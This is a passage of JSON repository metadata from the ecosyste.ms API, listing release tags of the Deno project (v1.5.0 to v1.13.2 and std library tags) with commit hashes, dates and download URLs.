ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed